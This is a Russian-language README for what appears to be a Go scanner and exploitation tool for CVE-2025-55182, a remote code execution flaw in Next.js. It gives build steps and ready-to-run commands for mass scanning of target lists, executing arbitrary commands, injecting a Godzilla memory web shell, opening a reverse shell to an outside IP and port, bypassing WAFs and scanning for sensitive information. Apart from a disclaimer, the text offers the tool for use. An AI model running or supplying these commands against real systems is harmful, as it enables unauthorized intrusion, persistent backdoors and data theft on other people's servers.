
Сканер и инструмент эксплуатации на Go для CVE-2025-55182 (RCE в Next.js). Поддерживает массовое сканирование, выполнение команд, внедрение оболочки в память Godzilla, обратную оболочку и обход WAF.
Инструмент для сканирования и эксплуатации уязвимости CVE-2025-55182 – удалённого выполнения кода в приложениях Next.js. Поддерживает массовое обнаружение, выполнение команд, инъекцию память-шелла Godzilla и обратный шелл.
⚠️ Данный инструмент предназначен исключительно для исследований безопасности и авторизованного тестирования. Не используйте его в незаконных целях.
.txt файлов.success.json, с возможностью вывода списка уязвимых URL в указанный файл.[
]
git clone https://github.com/luoqichen/CVE-2025-55182-POC.git
cd cve-2025-55182-POC
go build -o cve-2025-55182 main.go
./cve-2025-55182 -h
./cve-2025-55182 -u http://target.com:3000
./cve-2025-55182 -f targets.txt -t 20 -o vuln.txt
./cve-2025-55182 -u http://target.com:3000 -c "whoami"
./cve-2025-55182 -u http://target.com:3000 -g
После успешной инъекции инструмент выведет адрес подключения Godzilla, пароль, ключ и информацию о заголовке запроса.
./cve-2025-55182 -u http://target.com:3000 -rs 10.0.0.1:4444
./cve-2025-55182 -f targets.txt -p http://127.0.0.1:8080 -t 10
success.json – автоматически сохраняет подробную информацию обо всех успешно эксплуатированных целях (включая вывод команд, конфигурацию Godzilla и т.д.).-o – сохраняет список уязвимых URL (по одному на строку).Во время сканирования в реальном времени отображается индикатор прогресса и найденные уязвимости. В конце выводятся статистические данные.
-p для задания прокси.-to.Данный инструмент предназначен только для исследований безопасности и авторизованного тестирования. Пользователь несёт полную юридическую ответственность. Разработчик не несёт ответственности за любое неправомерное использование.
| Параметр | Тип | Значение по умолч. | Описание |
|---|
-u | string | нет | Одиночный целевой URL (например http://example.com:3000) |
-f | string | нет | Файл со списком URL (по одному на строку) |
-d | string | нет | Папка с несколькими .txt файлами |
-o | string | нет | Выходной файл (список уязвимых URL, по одному на строку) |
-t | int | 10 | Количество потоков |
-to | int | 10 | Таймаут запроса (сек) |
-c | string | нет | Команда для выполнения (например id) |
-m | string | нет | Режим: waf (включить обход WAF) |
-p | string | нет | HTTP-прокси (например http://127.0.0.1:8080) |
-g | bool | false | Включить инъекцию память-шелла Godzilla |
-rs | string | нет | Адрес для обратного шелла (формат IP:PORT) |
-dv | bool | false | Подробный режим (вывод процесса сканирования для каждого URL) |
-es | bool | false | Режим сканирования чувствительной информации |